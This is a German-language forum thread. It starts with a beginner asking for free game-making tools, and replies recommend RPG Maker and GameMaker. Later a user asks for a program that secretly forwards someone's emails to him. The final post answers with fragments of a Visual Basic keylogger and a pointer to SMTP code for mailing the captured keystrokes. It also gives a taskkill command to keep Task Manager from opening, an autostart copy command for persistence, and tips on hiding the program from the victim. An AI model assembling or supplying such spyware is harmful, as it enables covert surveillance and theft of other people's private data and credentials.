Ergebnis 1 bis 9 von 9
  1. #1
    ZoCkEr_4000 ZoCkEr_4000 ist offline

    Programm zum Programmieren gesucht!

    Hi

    Ich suche ein kostenloses programm mit dem ich einfach ein kleines spiel programmiern kann!

    Könnt ihr mir helfen?

    Danke,

    lg Z4

  2. Anzeige

    Programm zum Programmieren gesucht!

    Schau dir mal diesen Bereich an. Dort ist für jeden was dabei!
  3. #2
    Baci Baci ist offline
    Avatar von Baci

    AW: Programm zum Programmieren gesucht!

    Zitat ZoCkEr_4000 Beitrag anzeigen
    Hi

    Ich suche ein kostenloses programm mit dem ich einfach ein kleines spiel programmiern kann!

    Könnt ihr mir helfen?

    Danke,

    lg Z4
    hi schau mal hier rein klick mich!!
    das einfachste wäre der RPG-Maker und er ist kostenlos

  4. #3
    ZoCkEr_4000 ZoCkEr_4000 ist offline

    AW: Programm zum Programmieren gesucht!

    Danke!


    lg Z4

  5. #4
    cut cut ist offline

    AW: Programm zum Programmieren gesucht!

    Was für Vorkenntnisse hast du?
    Das ist alles nicht so einfach. Kleinere Spiele kannst du in Flash mit Actionscript 2.0 (bzw bald 3.0) schreiben, aber auch dafür brauchst du ein grundlegendes Verständnis von Programmierung/Script-Sprachen. Dann gibt es natürlich richtige 3D Spielentwicklungssoftware wie Unity, aber das erfordert sehr viel einarbeitung und hohe Kenntnisse in C# und Java. Zudem braucht man jede Menge zusätzlicher Software und wirkliche Ergebnisse sind nur in Monaten arbeit von mehrern Leuten zuerzielen Usw. Aber das ist natürlich nicht kostenlos. Nur, wenn du dir Vorstellst, man können einfach so Games runterschreiben.

    Wenn du soetwas wie Flash/Actionscript suchst, und einigermaßen scrippten kannst, kann man vielleich in Processing 1.0 (BETA) auch kleinere „Games“ schreiben. Wobei das eigentlich dafür nicht wirklich geeignet ist.
    Das hier ist in processing geschrieben:
    YouTube - MobZombies Trailer

    Aber ich denken, wenn du die nötige Vorkenntniss hättest, wüsstest du das schon.

    Früher gab es so Programme wie „Klick & Play“ in denen man mit sehr sehr geringer Einarbeitung in einem Baukasten System Spiele bauen konnte. Ka ob es soetwas frei gibt.

    Ah grad nochmal gegoolet, vielleicht findest du hier etwas:
    Educational Gameplay for the PlayStation Generation
    bzw
    Educational Gameplay for the PlayStation Generation


    EDIT:
    Ach ja, genau der RPG-Maker, das ist natürlich sehr einfach.

  6. #5
    Noshire Noshire ist offline
    Avatar von Noshire

    AW: Programm zum Programmieren gesucht!

    Und ob es so etwas frei gibt. Nämlich den GameMaker. Da es mehrere Versionen mit Vor- und Nachteilen gibt, hab ich dir hier den Artikel bei Wikipedia. Dort stehen alle Versionen drin, ausserdem solltest du dort auch die Downloadlinks finden.

    Ich persönlich arbeite schon seit etwa 4 Jahren mit dem RPG-Maker. Mit dem kannst du dich wirklich an jede Spielegrösse heranwagen. Allerdings ist er - wie der Name schon sagt - am besten für Rollenspiele geeignet.
    Ich arbeite zusammen mit einem Partner an einem grösseren Projekt, hab aber auch schon kleinere Minigames gebastelt.
    Der RPGMaker ist auf jeden Fall sehr einsteigerfreundlich, jedoch nicht kostenfrei (bzw nicht mehr, eine Weile lang befand er sich ja in einer juristischen Grauzone...).

  7. #6
    orangenblau

    wer programmiert mir was

    hey
    ich suche jem. der mir ein programm programmiert .
    das programm soll folgendes drauf haben wenn der jenige auf seine email adresse eine email bekommt soll diese email ohne das er es merkt an mich weiter geleitet werden .

    danke schon mal ich würde mich erkenntlich zeigen wenn mir jem. helfen könnt "moneymoney"

    PS: könnt ihr mir vllt sagen ob sowas überhaupt möglich ist ,weil theoretisch kan ich mir das vorstellen.

  8. #7
    Unregistriert

    AW: Programm zum Programmieren gesucht!

    wofür brauchst du denn so ein programm ??

  9. #8
    M3PHISTO M3PHISTO ist offline
    Avatar von M3PHISTO

    AW: Programm zum Programmieren gesucht!

    Ist Realisierbar sowas nennt man aber Trojaner/Virus/Spyware soviel ich weiss :-P

    GameMaker oder andere Programme in der Art sind nicht wirklich Sachen womit man sich ein Spiel Programmiert, man bastelt einfach aus i.welchen Sachen sich ein Spiel Zusammen die dann nachher eh alle gleich sind.

  10. #9
    BaGplatt

    Ausrufezeichen AW: Bsp...

    Hey,
    Versuchs mal mit einem Keylogger in vb6/8.....
    Dann kannste das opfer direkt ausspionoieren......

    Ich gebe dir mal aus sicherheitsgründe "Teile" vom Code......
    ---------------------------------
    Private Declare Function GetAsyncKeyState Lib "user32" _
    (ByVal vKey As KeyCodeConstants) As Long
    Dim Result As Integer
    For i = 1 To 255
    Result = 0
    Result = GetAsyncKeyState(i)
    If Result = -32767 Then
    Textbox1.Text = Textbox1.Text + Chr(i)
    End if
    ---------------------------------


    Dann brauchste noch´n Code für Emails senden :

    Den holste dir mal daa, hab gerade ke lust den zu senden :

    YouTube - VB 2008 - Send E-Mail via SMTP

    Dann könnteste evt. einen Taskill Code gebauchen.....

    Probier dazu mal dass :

    taskkill /f /im blabla.exe"

    Musst natürlich was anderes als blabla hinschreibeiben....

    Will dir ja auch nicht alles veraten....

    Dann könnte man ja natürlich auch noch einen Code gebrauchen, wo die datei in den autostart SOFORT kopiert, "Registry" =)

    Versuch dass mal, bzw. verändere es mal ein wenig :

    ----------------------------------

    chcp 1252
    xcopy test.exe "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\"


    Dass kannste dann z.B. mit "Call Shell" starten....

    wie gesagt du musst alles verändern....

    Dann machste das Programm noch unsichtbar, so in der taskleiste wie im Taskmanager....

    Wobei wenn du aufgepasst hast dass nicht brauchst da der Taskmanager beim aurufen SOFORT gekill wird, WENN du den obigen Code mit dem Taskill richtig eingesetzt hast,
    dafür verwendest du ambesten einen Timer mit nem intervall von 100.....

    Damit die Email´s gesendet werden mcahste auch nen Timer...

    Bei Fragen schreiben.....

    Gruß BaGplatt

Ähnliche Themen


  1. Welches Programm zum Programmieren: Hi, Bin grade dabei C++ zu lernen und suche ein Programm was gratis ist und an dem man gut üben kann. Bitte mit erklärung zum Programm!:confused: ...

  2. Programm gesucht!: Hi ich suche ein Programm mitdem ich sounds speichern kann, die ich dann über eine tastenkombi abspielen lassen kann. Danke

  3. Programm zum programmieren: Hallo, ich suche ein gutes programm zum programmieren von spielen websites, programmen, Konsolenanwendungen,...Am besten ein einfaches wo ich auch...

  4. programm zum programmieren oder einfach programieren?!?!?: hi ich bin neu hier ;) ich hab mal ne question: ich spiele gerne und schon seit langem browsergames... aber jetzt bin ich bei einem, wo...

  5. Programm/Programmieren: Kann mir Jemand sagen, ob es möglich ist ein Programm zu schreiben, das den Inhalt einer Webseite regelmässig aktualisiert und nach einem oder...